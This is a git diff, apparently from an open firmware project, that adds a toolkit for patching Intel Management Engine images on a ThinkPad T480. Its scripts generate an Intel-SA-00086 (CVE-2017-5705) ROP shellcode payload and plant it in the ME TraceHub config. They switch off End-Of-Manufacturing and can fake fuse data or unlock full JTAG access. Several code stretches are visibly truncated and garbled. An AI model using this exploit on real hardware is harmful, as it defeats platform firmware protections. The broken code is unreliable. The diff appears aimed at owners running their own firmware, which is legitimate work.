LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +License for original exploit generator (me_exp_bxtp_me11.py): + +Copyright (c) 2018 Mark Ermolov, Maxim Goryachy at Positive Technologies + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/blobs/t480/deguard/finalimage.py b/blobs/t480/deguard/finalimage.py new file mode 100755 index 00000000..c77f5f4f --- /dev/null +++ b/blobs/t480/deguard/finalimage.py @@ -0,0 +1,111 @@ +#!/usr/bin/python3 +# SPDX-License-Identifier: GPL-2.0-only + +import argparse +import os +from lib.exploit import GenerateShellCode +from lib.image import parse_ifd_or_me +from lib.mfs import INTEL_IDX, FITC_IDX, HOME_IDX, MFS +from lib.cfg import CFG + +def generate_fitc_from_intel_and_delta(intel_cfg, delta_dir): + # Create empty fitc.cfg + fitc_cfg = CFG() + + for intel_file in intel_cfg.files: + # Copy over directory + if intel_file.isDirectory(): + fitc_cfg.addFile(intel_file.path, intel_file.data, + intel_file.record.mode, intel_file.record.opt, + intel_file.record.uid, intel_file.record.gid) + continue + + # Skip non-overridable file + if (intel_file.record.opt & 1) == 0: + continue + + # Look for file in the delta + delta_path = os.path.join(delta_dir, intel_file.path.lstrip("/")) + if os.path.isfile(delta_path): + # Create modified overridable file from delta + with open(delta_path, "rb") as f: + fitc_cfg.addFile(intel_file.path, f.read(), + intel_file.record.mode, intel_file.record.opt, + intel_file.record.uid, intel_file.record.gid) + else: + # Copy over unmodified overridable file + fitc_cfg.addFile(intel_file.path, intel_file.data, + intel_file.record.mode, intel_file.record.opt, + intel_file.record.uid, intel_file.record.gid) + + return fitc_cfg + +def apply_exploit_to_fitc(fitc_cfg, version, pch, sku, fake_fpfs, red_unlock): + # Make sure End-Of-Manufacturing is off + fitc_cfg.removeFile("/home/mca/eom") + fitc_cfg.addFile("/home/mca/eom", b"\x00", CFG.strToMode(' --Irw-r-----'), CFG.strToOpt('?!-F'), 0, 238) + + # Generate TraceHub configuration file with exploit payload + ct_payload = GenerateShellCode(version, pch, sku, fake_fpfs, red_unlock) + # Add TraceHub configuration file + fitc_cfg.removeFile("/home/bup/ct") + fitc_cfg.addFile("/home/bup/ct", ct_payload, CFG.strToMode(' ---rwxr-----'), CFG.strToOpt('?--F'), 3, 351) + +def add_fitc_to_sysvol(sysvol, fitc_data): + # Delete original fitc.cfg + sysvol.removeFile(FITC_IDX) + # Delete home partition (we want all data to come from the new fitc.cfg) + sysvol.removeFile(HOME_IDX) + # Insert new fitc.cfg + # NOTE: optimize=False is required to break up continous chunks, + # which causes the vulnerable code to perform multiple reads. + sysvol.addFile(FITC_IDX, fitc_data, optimize=False) + +parser = argparse.ArgumentParser() +parser.add_argument("--input", required=True, help="Donor image (either full with IFD or just ME)") +parser.add_argument("--output", required=True, help="Output ME image") +parser.add_argument("--delta", required=True, help="MFS delta directory") +parser.add_argument('--version', required=True, help='Donor ME version') +parser.add_argument('--pch', required=True, help='PCH type') +parser.add_argument('--sku', metavar='', help='ME SKU', required=True) +parser.add_argument('--fake-fpfs', help='replace SRAM copy of FPFs with the provided data') +parser.add_argument('--red-unlock', help='allow full JTAG access to the entire platform', action='store_true') +args = parser.parse_args() + +# Get ME from input image +with open(args.input, "rb") as f: + me = parse_ifd_or_me(f.read()) + +# Make sure delta directory exists +if not os.path.isdir(args.delta): + raise ValueError(f"Delta directory {args.delta} not found") + +# Read FPF data +fake_fpfs = None +if args.fake_fpfs: + with open(args.fake_fpfs, "rb") as f: + fake_fpfs = f.read() + +# Parse MFS and get its system volume +mfs = MFS(me.entry_data("MFS")) +sysvol = mfs.getSystemVolume() + +# Read intel.cfg +intel_cfg = CFG(sysvol.getFile(INTEL_IDX).data) + +# Generate fitc.cfg +fitc_cfg = generate_fitc_from_intel_and_delta(intel_cfg, args.delta) +# Modify fitc.cfg with exploit +apply_exploit_to_fitc(fitc_cfg, args.version, args.pch, args.sku, fake_fpfs, args.red_unlock) +# Re-generate fitc.cfg +fitc_cfg.generate(alignment=2) + +# Write fitc.cfg +add_fitc_to_sysvol(sysvol, fitc_cfg.data) +# Re-generate MFS +mfs.generate() +# Write MFS to ME image +me.write_entry_data("MFS", mfs.data) +# Write out ME image +with open(args.output, "wb") as f: + f.write(me.data) diff --git a/blobs/t480/deguard/gen_shellcode.py b/blobs/t480/deguard/gen_shellcode.py new file mode 100755 index 00000000..1d8fbfbe --- /dev/null +++ b/blobs/t480/deguard/gen_shellcode.py @@ -0,0 +1,24 @@ +#!/usr/bin/python3 +# SPDX-License-Identifier: GPL-2.0-only + +import argparse +from lib.exploit import GenerateShellCode + +parser = argparse.ArgumentParser(description="Intel-SA-00086 (CVE-2017-5705) exploit generator for ME 11.x.x.x") +parser.add_argument('-o', '--output', metavar='', help='output file path', required=True) +parser.add_argument('-v', '--version', metavar='', help='ME version', required=True) +parser.add_argument('-p', '--pch', metavar='', help='PCH type', required=True) +parser.add_argument('-s', '--sku', metavar='', help='ME SKU', required=True) +parser.add_argument('--fake-fpfs', metavar='', help='replace SRAM copy of FPFs with the provided data') +parser.add_argument('--red-unlock', help='allow full JTAG access to the entire platform', action='store_true') +args = parser.parse_args() + +fake_fpfs = None +if args.fake_fpfs: + with open(args.fake_fpfs, "rb") as f: + fake_fpfs = f.read() + +data = GenerateShellCode(args.version, args.pch, args.sku, fake_fpfs, args.red_unlock) + +with open(args.output, "wb") as f: + f.write(data) diff --git a/blobs/t480/deguard/generatedelta.py b/blobs/t480/deguard/generatedelta.py new file mode 100755 index 00000000..9153d61b --- /dev/null +++ b/blobs/t480/deguard/generatedelta.py @@ -0,0 +1,76 @@ +#!/usr/bin/python3 +# SPDX-License-Identifier: GPL-2.0-only + +import argparse +import os +from lib.image import parse_ifd_or_me +from lib.mfs import INTEL_IDX, FITC_IDX, HOME_IDX, MFS +from lib.cfg import CFG + +def delta_from_fitc_cfg(overridable, fitc_files, output): + if set(fitc_files.keys()).difference(overridable.keys()) != set(): + raise ValueError("fitc.cfg contains unexpected data, please report this for investigation") + # Iterate overridable paths from intel.cfg + for path, intel_file in overridable.items(): + # Skip dirs + if intel_file.isDirectory(): + continue + # Skip files not in fitc + if path not in fitc_files: + continue + fitc_file = fitc_files[path] + if intel_file.data != fitc_file.data: + # Write out differing file to delta + filepath = os.path.join(output, path.lstrip("/")) + os.makedirs(os.path.dirname(filepath), exist_ok=True) + with open(filepath, "wb") as f: + f.write(fitc_file.data) + +def delta_from_home(overridable, home_files, output): + # Iterate overridable paths from intel.cfg + for path, intel_file in overridable.items(): + # Skip dirs + if intel_file.isDirectory(): + continue + # Skip files not in /home + if path not in home_files: + continue + if intel_file.data != home_files[path]: + # Write out differing file to delta + filepath = os.path.join(output, path.lstrip("/")) + os.makedirs(os.path.dirname(filepath), exist_ok=True) + with open(filepath, "wb") as f: + f.write(home_files[path]) + +parser = argparse.ArgumentParser() +parser.add_argument("--input", required=True, help="Input vendor image (either full with IFD or just ME)") +parser.add_argument("--output", required=True, help="Output MFS delta directory") +args = parser.parse_args() + +# Get ME from input image +with open(args.input, "rb") as f: + me = parse_ifd_or_me(f.read()) + +# Parse MFS and get its system volume +mfs = MFS(me.entry_data("MFS")) +sysvol = mfs.getSystemVolume() + +# Lookup table of directories and overridable paths in intel.cfg +intel_cfg = CFG(sysvol.getFile(INTEL_IDX).data) +overridable = { file.path: file for file in intel_cfg.files \ + if file.isDirectory() or (file.record.opt & 1) != 0 } + +fitc = sysvol.getFile(FITC_IDX) + +if fitc: + # We have a fitc.cfg, so compute delta from that + fitc_cfg = CFG(fitc.data) + fitc_files = { file.path: file for file in fitc_cfg.files } + delta_from_fitc_cfg(overridable, fitc_files, args.output) +else: + # If there is no fitc we must have a /home + if not sysvol.getFile(HOME_IDX): + raise Error("MFS has no fitc.cfg or home directory, please provide an image with valid config data") + # Build lookup table from files in home in /home + home_files = { path: data for path, data in sysvol.listDir(HOME_IDX, True, "/home") } + delta_from_home(overridable, home_files, args.output) diff --git a/blobs/t480/deguard/lib/cfg.py b/blobs/t480/deguard/lib/cfg.py new file mode 100644 index 00000000..05078210 --- /dev/null +++ b/blobs/t480/deguard/lib/cfg.py @@ -0,0 +1,272 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This code is based on MFSUtil by Youness Alaoui (see `doc/LICENSE.orig` for original copyright) + +import posixpath +import struct +from functools import cmp_to_key + +def cmp(a, b): + return (a > b) - (a < b) + +class CFGAlignment: + ALIGN_NONE = 0 + ALIGN_START = 1 + ALIGN_END = 2 + +class CFG(object): + CFG_FMT = struct.Struct(" 1 + file = self.getFile(posixpath.join(*path)) + assert file and file.isDirectory() + assert file.record.mode == record.mode + path.pop() + else: + file = CFGFile(posixpath.join(*path + [record.name]), record, self.data, parent) + self.files.append(file) + if record.isDirectory(): + path.append(record.name) + parent = self.getFile(posixpath.join(*path)) + self.records.append(record) + + def getFile(self, path): + for file in self.files: + if file.path == path: + return file + return None + + def removeFile(self, path, recursive = False): + file = self.getFile(path) + if file: + if len(file.children) > 0 and not recursive: + return False + # Copy list of children since we're modifying the list + for child in file.children[:]: + self.removeFile(child.path, recursive) + self.files.remove(file) + if file.parent: + file.parent.removeChild(file) + return True + else: + return False + + def addFile(self, path, data, mode, opt, uid, gid): + # Make sure it doesn't already exists + file = self.getFile(path) + if file: + raise ValueError(f"CFG path {path} already exists") + + directory = False + (parent_path, filename) = posixpath.split(path) + + if filename == "": + directory = True + (parent_path, filename) = posixpath.split(parent_path) + + # Make sure parent exists if it is not the root + parent = self.getFile(parent_path) + if parent_path != "/"and parent is None: + raise ValueError(f"CFG path {path} already exists") + + record = CFGRecord.createRecord(filename, mode, opt, uid, gid, len(data), 0) + file = CFGFile(path, record, data, parent) + self.files.append(file) + + def generate(self, alignment): + self.records = [] + file_data = b"" + if len(self.files) > 0: + (self.records, file_data) = self.files[0].generateRecords(alignment=alignment) + self.num_records = len(self.records) + self.data = self.CFG_FMT.pack(self.num_records) + data_offset = len(self.data) + CFGRecord.RECORD_FMT.size * self.num_records + alignment_data = b"" + if alignment != CFGAlignment.ALIGN_NONE: + alignment_extra = data_offset % 0x40 + if alignment_extra > 0: + alignment_data += struct.pack("> i): + ret += modeStr[i] + else: + ret += "-" + return ret + + @staticmethod + def strToMode(str): + modeStr = "dAEIrwxrwxrwx" + assert len(str) == len(modeStr) + mode = 0 + for i in range(13): + if str[i] == modeStr[i]: + mode |= (0x1000 >> i) + else: + assert str[i] == '-' or str[i] == ' ' + return mode + + @staticmethod + def optToStr(opt): + assert opt & 0xFFF0 == 0 + optStr = "?!MF" + ret = "" + for i in range(4): + if opt & (8 >> i): + ret += optStr[i] + else: + ret += "-" + return ret + + @staticmethod + def strToOpt(str): + optStr = "?!MF" + assert len(str) == len(optStr) + opt = 0 + for i in range(4): + if str[i] == optStr[i]: + opt |= (8 >> i) + else: + assert str[i] == '-' or str[i] == ' ' + return opt + +class CFGRecord(object): + RECORD_FMT = struct.Struct("<12sHHHHHHL") + + def __init__(self, data, index): + offset = CFG.CFG_FMT.size + self.RECORD_FMT.size * index + self.data = data[offset:offset + self.RECORD_FMT.size] + (self.name, zero, self.mode, self.opt, self.size, + self.uid, self.gid, self.offset) = self.RECORD_FMT.unpack(self.data) + self.name = self.name.decode('utf-8') + self.name = self.name.strip('\0') + if self.name == "..": + assert self.isDirectory() + assert self.opt == 0 + if self.isDirectory(): + assert self.size == 0 + + def isDirectory(self): + return self.mode & 0x1000 == 0x1000 + + def generate(self): + self.data = CFGRecord.RECORD_FMT.pack(self.name.encode("utf-8"), 0, self.mode, self.opt, + self.size, self.uid, self.gid, self.offset) + + @staticmethod + def createRecord(name, mode, opt, uid, gid, size, offset): + data = b'\0' * CFG.CFG_FMT.size + \ + CFGRecord.RECORD_FMT.pack(name.encode("utf-8"), 0, mode, opt, size, uid, gid, offset) + return CFGRecord(data, 0) + + def copy(self): + return self.createRecord(self.name, self.mode, self.opt, self.uid, self.gid, self.size, self.offset) + + def __str__(self): + return "%-12s (%04X:%04X) [%4d bytes @ %8X] %s _ %s" % (self.name, self.uid, self.gid, + self.size, self.offset, CFG.modeToStr(self.mode), CFG.optToStr(self.opt)) + +class CFGFile(object): + def __init__(self, path, record, data, parent=None): + self.path = path + self.record = record + self.data = data[record.offset:record.offset + record.size] + self.parent = parent + self.children = [] + if parent: + parent.addChild(self) + + @property + def size(self): + return self.record.size + + def isDirectory(self): + return self.record.isDirectory() + + def addChild(self, child): + assert self.isDirectory() + self.children.append(child) + self.children.sort(key=cmp_to_key(CFGFile.__cmp__)) + + def removeChild(self, child): + assert self.isDirectory() and child in self.children + self.children.remove(child) + + def generateRecords(self, data = b"", alignment=CFGAlignment.ALIGN_NONE): + self.record.size = 0 if self.isDirectory() else self.size + self.record.offset = 0 if self.isDirectory() else len(data) + records = [self.record] + if self.isDirectory(): + for child in self.children: + (sub_records, new_data) = child.generateRecords(data, alignment) + records += sub_records + data = new_data + + dotdot = self.record.copy() + dotdot.name = '..' + dotdot.opt = 0 + records.append(dotdot) + else: + alignment_extra = 0 + if alignment == CFGAlignment.ALIGN_START: + alignment_extra = self.record.offset % 0x40 + elif self.record.size != 0 and alignment == CFGAlignment.ALIGN_END: + alignment_extra = (self.record.offset + self.record.size) % 0x40 + if alignment_extra > 0: + data += struct.pack(" pointing to valid descriptors below +# shared mem descriptors with address of memcpy_s ret address +# up to 0x380 with syslib context pointing up +# chunk with pointers to ROP address + +def GenerateShellCode(version, pch, sku, fake_fpfs, red_unlock): + me_info = None + for info in ME_INFOS: + if info.ME_VERSION == version and info.PCH_TYPE == pch and info.ME_SKU == sku: + me_info = info + break + + if me_info is None: + raise ValueError("Cannot find required information for ME version, PCH type, and ME SKU.") + + # Add ROPs + data, rops_start = GenerateRops(me_info, fake_fpfs, red_unlock) + if data is None: + return None + + # Create syslib context and add it to the data + syslib_ctx_addr = me_info.BUFFER_ADDRESS + len(data) + (syslib_ctx, syslib_ctx_addr) = GenerateSyslibCtx(me_info, syslib_ctx_addr) + data += syslib_ctx + + # Create TLS structure + tls = struct.pack(" me_info.BUFFER_OFFSET: + raise ValueError("Too much data in the ROPs, cannot fit payload within 0x%X bytes" % me_info.BUFFER_OFFSET) + + # Add padding and add TLS at the end of the buffer + data += struct.pack("len(data): + return None + return struct.unpack("len(data): + return None + return struct.unpack("> bf[0] & bf[1] + +class IFDRegion(Enum): + IFD = 0 + BIOS = 1 + ME = 2 + GBE = 3 + PD = 4 + EC = 8 + +class IFDImage: + MAGIC_OFF = 0x10 + MAGIC = 0x0FF0A55A + + FLMAP0_OFF = 0x14 + FLMAP0_FRBA = (16, 0xff) + + FLREGN_BASE = (0, 0x7fff) + FLREGN_LIMIT = (16, 0x7fff) + + def __init__(self, data): + self.data = bytearray(data) + + # Verify magic + if dword_le(self.data, self.MAGIC_OFF) != self.MAGIC: + raise ValueError("Invalid IFD magic") + + # Find base address of regions + flmap0 = dword_le(self.data, self.FLMAP0_OFF) + frba = ex(flmap0, self.FLMAP0_FRBA) << 4 + + # Parse regions + self.regions = {} + for region in IFDRegion: + flregN = dword_le(self.data, frba + 4 * region.value) + base = ex(flregN, self.FLREGN_BASE) + limit = ex(flregN, self.FLREGN_LIMIT) + if base == 0x7fff and limit == 0x0000: # Unused region + continue + self.regions[region] = (base << 12, limit << 12 | 0xfff) + + def __str__(self): + return "\n".join(f" {region.name:<4} {extent[0]:08x}-{extent[1]:08x}" \ + for region, extent in self.regions.items()) + + def region_data(self, region): + if region not in self.regions: + raise ValueError(f"IFD region {region} not present") + base, limit = self.regions[region] + return self.data[base:limit] + +class MeImage: + HEADER_OFF = 0x10 + + MARKER_OFF = 0x10 + MARKER = b"$FPT" + + NUMENT_OFF = 0x14 + HDRLEN_OFF = 0x20 + HDRSUM_OFF = 0x21 + + ENTRY_OFF = 0x30 + ENTRY_SIZE = 0x20 + + def __init__(self, data): + self.data = bytearray(data) + + # Verify magic and checksum + if self.data[self.MARKER_OFF:self.MARKER_OFF+4] != self.MARKER: + raise ValueError("Invalid $FPT magic") + if sum(self.data[self.HEADER_OFF:self.data[self.HDRLEN_OFF]]) != 0: + raise ValueError("Invalid $FPT checksum") + + # Parse entries + self.entries = {} + for idx in range(self.data[self.NUMENT_OFF]): + off = self.ENTRY_OFF + idx * self.ENTRY_SIZE + name, _, offset, length, _, _, _, flags = struct.unpack("<4sIIIIIII", \ + self.data[off:off+self.ENTRY_SIZE]) + self.entries[name.strip(b"\0").decode()] = (offset, length, flags) + + def __str__(self): + return "\n".join(f" {name:<4} {entry[0]:08x}-{entry[1]:08x} {entry[2]:08x}" \ + for name, entry in self.entries.items()) + + def entry_data(self, name): + if name not in self.entries: # No entry + raise ValueError(f"Unknown $FPT entry {name}") + offset, length, flags = self.entries[name] + if flags & 0xff00_0000 != 0: # Invalid entry + raise ValueError(f"Invalid $FPT entry {name}") + return self.data[offset:offset+length] + + def write_entry_data(self, name, data): + if name not in self.entries: # No entry + raise ValueError(f"Unknown $FPT entry {name}") + offset, length, flags = self.entries[name] + if flags & 0xff00_0000 != 0: # Invalid entry + raise ValueError(f"Invalid $FPT entry {name}") + if len(data) != length: + raise ValueError(f"Wrong data length") + self.data[offset:offset+length] = data + +def parse_ifd_or_me(data): + try: + # Try parse as full image + ifd_image = IFDImage(data) + return MeImage(ifd_image.region_data(IFDRegion.ME)) + except: + # Assume it is just an ME + return MeImage(data) diff --git a/blobs/t480/deguard/lib/mfs.py b/blobs/t480/deguard/lib/mfs.py new file mode 100644 index 00000000..9dee71bc --- /dev/null +++ b/blobs/t480/deguard/lib/mfs.py @@ -0,0 +1,508 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This code is based on MFSUtil by Youness Alaoui (see `doc/LICENSE.orig` for original copyright) + +import struct +from functools import cmp_to_key + +INTEL_IDX = 6 # Default configuration +FITC_IDX = 7 # Vendor configuration +HOME_IDX = 8 # Runtime ME data + +def cmp(a, b): + return (a > b) - (a < b) + +class MFS(object): + PAGE_SIZE = 0x2000 # Page size is 8K + CHUNK_SIZE = 0x40 # Chunk size is 64 bytes + CHUNK_CRC_SIZE = 2 # Size of CRC16 + CHUNKS_PER_DATA_PAGE = 122 # 122 chunks per Data page + CHUNKS_PER_SYSTEM_PAGE = 120 # 120 chunks per System page + + CRC8TabLo = bytearray([0, 7, 14, 9, 28, 27, 18, 21, 56, 63, 54, 49, 36, 35, 42, 45]) + CRC8TabHi = bytearray([0, 112, 224, 144, 199, 183, 39, 87, 137, 249, 105, 25, 78, 62, 174, 222]) + CRC16Tab = [0]*256 + for i in range(256): + r = i << 8 + for j in range(8): r = (r << 1) ^ (0x1021 if r & 0x8000 else 0) + CRC16Tab[i] = r & 0xFFFF + + def __init__(self, data): + self.data = data + self.size = len(self.data) + assert self.size % self.PAGE_SIZE == 0 + + self.num_pages = self.size // self.PAGE_SIZE # Total number of pages + self.num_sys_pages = self.num_pages // 12 # Number of System pages + self.num_data_pages = self.num_pages - self.num_sys_pages - 1 # Number of Data pages + self.capacity = self.num_data_pages * self.CHUNKS_PER_DATA_PAGE * self.CHUNK_SIZE + + self.data_pages = [] + self.sys_pages = [] + self.to_be_erased = None + for page in range(self.num_pages): + page = MFSPage(self.data[page * self.PAGE_SIZE:(page + 1) * self.PAGE_SIZE], page) # Load page + if page.isToBeErased(): + assert self.to_be_erased == None + self.to_be_erased = page + elif page.isSystemPage(): + self.sys_pages.append(page) + else: + self.data_pages.append(page) + + assert self.num_sys_pages == len(self.sys_pages) + assert self.num_data_pages == len(self.data_pages) + + self.sys_pages.sort(key=cmp_to_key(MFSPage.__cmp__)) + self.data_pages.sort(key=cmp_to_key(MFSPage.__cmp__)) + + self.system_volume = MFSSystemVolume(self.sys_pages, self.data_pages) + + + def getSystemVolume(self): + return self.system_volume + + def generate(self): + for sys_page in self.sys_pages: + sys_page.resetChunks() + for data_page in self.data_pages: + data_page.resetChunks() + + self.system_volume.generate() + system_chunks = self.system_volume.generateChunks() + for i in range(0, len(self.sys_pages)): + chunks = system_chunks[i * MFS.CHUNKS_PER_SYSTEM_PAGE: (i+1) * MFS.CHUNKS_PER_SYSTEM_PAGE] + self.sys_pages[i].setChunks(chunks) + self.sys_pages[i].generate() + + for file in self.system_volume.iterateFiles(): + chunks = file.generateChunks() + for chunk in chunks: + data_page_idx = (chunk.id - self.system_volume.total_chunks) // MFS.CHUNKS_PER_DATA_PAGE + self.data_pages[data_page_idx].addChunk(chunk) + for data_page in self.data_pages: + data_page.generate() + self.data = b"" + for sys_page in self.sys_pages: + self.data += sys_page.data + for data_page in self.data_pages: + self.data += data_page.data + self.data += self.to_be_erased.data + + def __str__(self): + res = f"Pages : {self.num_pages} ({self.num_sys_pages} System && {self.num_data_pages} Data)\nSystem Pages:\n" + for i in range(self.num_sys_pages): + res += f" {i}: {self.sys_pages[i]}\n" + res += "Data Pages:\n" + for i in range(self.num_data_pages): + res += f" {i}: {self.data_pages[i]}\n" + res += f"\nSystem Volume : \n{self.system_volume}" + return res + + @staticmethod + def CrcIdx(w, crc=0x3FFF): + for b in bytearray(struct.pack("> 8)] ^ (crc << 8)) & 0x3FFF + return crc + + @staticmethod + def Crc16(ab, crc=0xFFFF): + for b in bytearray(ab): + crc = (MFS.CRC16Tab[b ^ (crc >> 8)] ^ (crc << 8)) & 0xFFFF + return crc + + @staticmethod + def Crc8(ab): + csum = 1 + for b in bytearray(ab): + b ^= csum + csum = MFS.CRC8TabLo[b & 0xF] ^ MFS.CRC8TabHi[b >> 4] + return csum + +class MFSPage(object): + PAGE_HEADER_FMT = struct.Struct("= self.first_chunk and \ + id < self.first_chunk + MFS.CHUNKS_PER_DATA_PAGE: + return self.chunks[id - self.first_chunk] + return None + + def resetChunks(self): + if self.isSystemPage(): + self.chunks = [] + else: + self.chunks = [None] * MFS.CHUNKS_PER_DATA_PAGE + + def setChunks(self, chunks): + self.chunks = chunks + + def addChunk(self, chunk): + id = chunk.id + assert self.isDataPage() and \ + id >= self.first_chunk and \ + id < self.first_chunk + MFS.CHUNKS_PER_DATA_PAGE + self.chunks[id - self.first_chunk] = chunk + + def generate(self): + data = self.PAGE_HEADER_FMT.pack(self.signature, self.USN, self.num_erase, self.next_erase, + self.first_chunk, 0, 0) + crc = MFS.Crc8(data[:-2]) + data = self.PAGE_HEADER_FMT.pack(self.signature, self.USN, self.num_erase, self.next_erase, + self.first_chunk, crc, 0) + if self.isSystemPage(): + assert len(self.chunks) <= MFS.CHUNKS_PER_SYSTEM_PAGE + chunk_ids = [] + last_chunk_id = 0 + for i, chunk in enumerate(self.chunks): + chunk_ids.append(MFS.CrcIdx(last_chunk_id) ^ chunk.id) + last_chunk_id = chunk.id + if len(self.chunks) == MFS.CHUNKS_PER_SYSTEM_PAGE or len(self.chunks) == 0: + chunk_ids.append(0xFFFF) + else: + # Use case of exactly 120 chunks in the last system page... + chunk_ids.append(0x7FFF) + chunk_ids += [0xFFFF] * (MFS.CHUNKS_PER_SYSTEM_PAGE - len(self.chunks)) + assert len(chunk_ids) == MFS.CHUNKS_PER_SYSTEM_PAGE + 1 + data += self.SYSTEM_PAGE_INDICES_FMT.pack(*chunk_ids) + for chunk in self.chunks: + data += chunk.getRawData() + data += b'\xFF' * ((MFS.CHUNKS_PER_SYSTEM_PAGE - len(self.chunks)) * \ + (MFS.CHUNK_SIZE + MFS.CHUNK_CRC_SIZE) + 0xC) + else: + assert len(self.chunks) == MFS.CHUNKS_PER_DATA_PAGE + data_free = [] + for i, chunk in enumerate(self.chunks): + if chunk: + assert chunk.id == self.first_chunk + i + data_free.append(0) + else: + data_free.append(0xFF) + data += self.DATA_PAGE_INDICES_FMT.pack(*data_free) + for i, chunk in enumerate(self.chunks): + if chunk: + data += chunk.getRawData() + else: + data += b"\xFF" * (MFS.CHUNK_SIZE + MFS.CHUNK_CRC_SIZE) + assert len(data) == MFS.PAGE_SIZE + self.data = data + + def __cmp__(self, other): + assert self.signature == other.signature and not self.isToBeErased() + assert self.isSystemPage() == other.isSystemPage() + if self.isSystemPage(): + return cmp(self.USN, other.USN) + else: + return cmp(self.first_chunk, other.first_chunk) + + def __str__(self): + if self.isToBeErased(): + return "ToBeErased" + if self.isSystemPage(): + chunk_ids = set() + for i in range(len(self.chunks)): + chunk_ids.add(str(self.chunks[i].id)) + chunk_ids = list(chunk_ids) + chunk_ids.sort() + res = "System-%d (USN: 0x%X): %s" % (self.page_id, self.USN, ", ".join(chunk_ids)) + else: + res = "Data-%d: %X" % (self.page_id, self.first_chunk) + return res + + def __repr__(self): + return str(self) + +class MFSChunk(object): + def __init__(self, data, chunk_id, raw=True): + self.chunk_id = chunk_id + if raw: + assert len(data) == MFS.CHUNK_SIZE + 2 + self.data = data[:-2] + self.crc, = struct.unpack(" 0: + data_chunk_idx = chain - self.num_files + page_idx = data_chunk_idx // MFS.CHUNKS_PER_DATA_PAGE + chunk = data_pages[page_idx].getChunk(self.total_chunks + data_chunk_idx) + next_chain = self.data_ids[data_chunk_idx] + size = MFS.CHUNK_SIZE if next_chain > MFS.CHUNK_SIZE else next_chain + self.files[id].addChunk(chunk, size) + if next_chain <= MFS.CHUNK_SIZE: + break + chain = next_chain + + @property + def numFiles(self): + return self.num_files + + def getFile(self, id): + if id >= 0 and id <= self.num_files: + return self.files[id] + return None + + def iterateFiles(self): + for id in range(self.num_files): + if self.files[id]: + yield self.files[id] + + def removeFile(self, id): + if id < 0 or id > self.num_files: + return + file = self.files[id] + if file is None: + return + self.files[id] = None + chain = self.file_ids[id] + self.file_ids[id] = 0 + while chain > MFS.CHUNK_SIZE: + next_chain = self.data_ids[chain - self.num_files] + self.data_ids[chain - self.num_files] = 0 + chain = next_chain + + def addFile(self, id, data, optimize=True): + self.removeFile(id) + file = MFSFile(id) + size = len(data) + data_chain = [] + for offset in range(0, size, MFS.CHUNK_SIZE): + if optimize: + chain = self.getNextFreeDataChunk() + else: + chain = self.getLastFreeDataChunk() + if chain == -1: + # If not enough space, free previously set chains + for chain in data_chain: + self.data_ids[chain] = 0 + return False + file.addData(self.total_chunks + chain, data[offset:offset+MFS.CHUNK_SIZE]) + if len(data_chain) > 0: + self.data_ids[data_chain[-1]] = chain + self.num_files + data_chain.append(chain) + self.data_ids[chain] = size - offset + if len(data_chain) > 0: + self.file_ids[id] = data_chain[0] + self.num_files + else: + # Empty file + self.file_ids[id] = 0xFFFF + self.files[id] = file + + def getNextFreeDataChunk(self): + for i, chain in enumerate(self.data_ids): + if chain == 0: + return i + return -1 + + def getLastFreeDataChunk(self): + for i, chain in reversed(list(enumerate(self.data_ids))): + if chain == 0: + return i + return -1 + + def generate(self): + data = self.SYSTEM_VOLUME_HEADER_FMT.pack(self.signature, self.version, self.capacity, self.num_files) + \ + struct.pack("<%dH" % self.num_files, *self.file_ids) + \ + struct.pack("<%dH" % len (self.data_ids), *self.data_ids) + total_data_size = (len(data) + MFS.CHUNK_SIZE - 1) & ~(MFS.CHUNK_SIZE - 1) + self.data = data.ljust(total_data_size, b'\0') + + def generateChunks(self): + self.generate() + empty_data = b'\0' * MFS.CHUNK_SIZE + chunks = [] + for offset in range(0, len(self.data), MFS.CHUNK_SIZE): + data = self.data[offset:offset + MFS.CHUNK_SIZE] + if data == empty_data: + continue + chunk = MFSChunk(data, offset // MFS.CHUNK_SIZE, False) + chunks.append(chunk) + return chunks + + def _listDirRecursive(self, file, integrity, prefix): + for dirent in file.decodeDir(integrity): + # Skip relative references + if dirent.name == "." or dirent.name == "..": + continue + # Absolute path to this file + path = prefix + "/" + dirent.name + file = self.getFile(dirent.id()) + # Yield field itself + yield path, file.decodeData(dirent.integrity()) + # Recursively yield entries if it is a subdirectory + if dirent.directory(): + yield from self._listDirRecursive(file, dirent.integrity(), prefix=path) + + def listDir(self, id, integrity, prefix): + file = self.getFile(id) + # Yield the root itself + yield prefix, file.decodeData(integrity) + # List its subdirectories + yield from self._listDirRecursive(file, integrity, prefix) + + def __str__(self): + res = f"Total of {self.num_files} file entries\n" + for i, f in enumerate(self.files): + if f: + res += f"{i}: {f}\n" + return res + +DIRECTORY_ENTRY_SIZE = 24 +INTEGRITY_BLOB_SIZE = 52 + +class MFSFile(object): + def __init__(self, id): + self.id = id + self.chain = [] + self.data = b"" + + def addChunk(self, chunk, size): + self.chain.append(chunk.id) + self.data = self.data + chunk.data[:size] + + def addData(self, id, data): + self.chain.append(id) + self.data = self.data + data + + def generateChunks(self): + chunks = [] + for i, chain in enumerate(self.chain): + data = self.data[i * MFS.CHUNK_SIZE:(i + 1) * MFS.CHUNK_SIZE] + data = data.ljust(MFS.CHUNK_SIZE, b'\0') + chunk = MFSChunk(data, chain, False) + chunks.append(chunk) + return chunks + + def decodeData(self, integrity): + if integrity: + return self.data[:-INTEGRITY_BLOB_SIZE] + return self.data + + def 